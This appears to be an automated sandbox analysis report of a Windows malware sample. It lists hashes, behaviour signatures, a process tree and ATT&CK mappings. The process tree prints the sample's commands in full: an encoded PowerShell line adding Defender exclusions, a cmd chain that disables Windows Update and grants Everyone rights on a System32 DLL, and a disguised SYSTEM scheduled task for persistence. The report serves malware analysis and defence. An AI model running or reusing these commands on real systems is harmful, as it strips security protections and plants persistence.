Analysis

  • max time kernel
    38s
  • max time network
    42s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-08-2022 22:15

General

  • Target

    3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe

  • Size

    1.8MB

  • MD5

    707de025f2ab727fbb3b33f4ff8b97b3

  • SHA1

    51a571a425a36cbbc3103d5e9991d080ccd4abc6

  • SHA256

    3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea

  • SHA512

    256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c

  • SSDEEP

    49152:Y1uZMQTHvWorKzx/L9GJENaYcBLxH030Du:Y1ueoH6xYJEHcU3Z

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
    "C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:824
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:756
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:656
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1860
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:632
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1304
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1076
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:1508
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:1256
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:1792
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:2020
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1332
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1936
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1012
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1476
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1844
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:860
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1084
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1952
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:1736
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:1980
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:1684
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:1288
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1032
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1540
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                      3⤵
                      • Creates scheduled task(s)
                      PID:1316
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1764
                    • C:\Windows\system32\schtasks.exe
                      schtasks /run /tn "GoogleUpdateTaskMachineQC"
                      3⤵
                        PID:336

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Execution

                  Scheduled Task

                  1
                  T1053

                  Persistence

                  Modify Existing Service

                  2
                  T1031

                  Scheduled Task

                  1
                  T1053

                  Privilege Escalation

                  Scheduled Task

                  1
                  T1053

                  Defense Evasion

                  Modify Registry

                  2
                  T1112

                  Impair Defenses

                  1
                  T1562

                  File Permissions Modification

                  1
                  T1222

                  Discovery

                  System Information Discovery

                  1
                  T1082

                  Impact

                  Service Stop

                  1
                  T1489

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/336-81-0x0000000000000000-mapping.dmp
                  • memory/632-69-0x0000000000000000-mapping.dmp
                  • memory/656-67-0x0000000000000000-mapping.dmp
                  • memory/756-66-0x0000000000000000-mapping.dmp
                  • memory/824-61-0x000000001B750000-0x000000001BA4F000-memory.dmp
                    Filesize

                    3.0MB

                  • memory/824-59-0x000007FEEB720000-0x000007FEEC27D000-memory.dmp
                    Filesize

                    11.4MB

                  • memory/824-60-0x0000000002804000-0x0000000002807000-memory.dmp
                    Filesize

                    12KB

                  • memory/824-62-0x000000000280B000-0x000000000282A000-memory.dmp
                    Filesize

                    124KB

                  • memory/824-63-0x0000000002804000-0x0000000002807000-memory.dmp
                    Filesize

                    12KB

                  • memory/824-64-0x000000000280B000-0x000000000282A000-memory.dmp
                    Filesize

                    124KB

                  • memory/824-58-0x000007FEEC280000-0x000007FEECCA3000-memory.dmp
                    Filesize

                    10.1MB

                  • memory/824-56-0x0000000000000000-mapping.dmp
                  • memory/860-85-0x0000000000000000-mapping.dmp
                  • memory/1012-82-0x0000000000000000-mapping.dmp
                  • memory/1032-92-0x0000000000000000-mapping.dmp
                  • memory/1076-71-0x0000000000000000-mapping.dmp
                  • memory/1084-86-0x0000000000000000-mapping.dmp
                  • memory/1256-73-0x0000000000000000-mapping.dmp
                  • memory/1288-91-0x0000000000000000-mapping.dmp
                  • memory/1304-70-0x0000000000000000-mapping.dmp
                  • memory/1316-80-0x0000000000000000-mapping.dmp
                  • memory/1332-76-0x0000000000000000-mapping.dmp
                  • memory/1476-83-0x0000000000000000-mapping.dmp
                  • memory/1508-72-0x0000000000000000-mapping.dmp
                  • memory/1540-78-0x0000000000000000-mapping.dmp
                  • memory/1684-90-0x0000000000000000-mapping.dmp
                  • memory/1708-65-0x0000000000000000-mapping.dmp
                  • memory/1736-88-0x0000000000000000-mapping.dmp
                  • memory/1764-79-0x0000000000000000-mapping.dmp
                  • memory/1792-74-0x0000000000000000-mapping.dmp
                  • memory/1844-84-0x0000000000000000-mapping.dmp
                  • memory/1860-68-0x0000000000000000-mapping.dmp
                  • memory/1936-77-0x0000000000000000-mapping.dmp
                  • memory/1952-87-0x0000000000000000-mapping.dmp
                  • memory/1980-89-0x0000000000000000-mapping.dmp
                  • memory/2000-55-0x000007FEFB761000-0x000007FEFB763000-memory.dmp
                    Filesize

                    8KB

                  • memory/2000-54-0x000000013F330000-0x000000013F50E000-memory.dmp
                    Filesize

                    1.9MB

                  • memory/2020-75-0x0000000000000000-mapping.dmp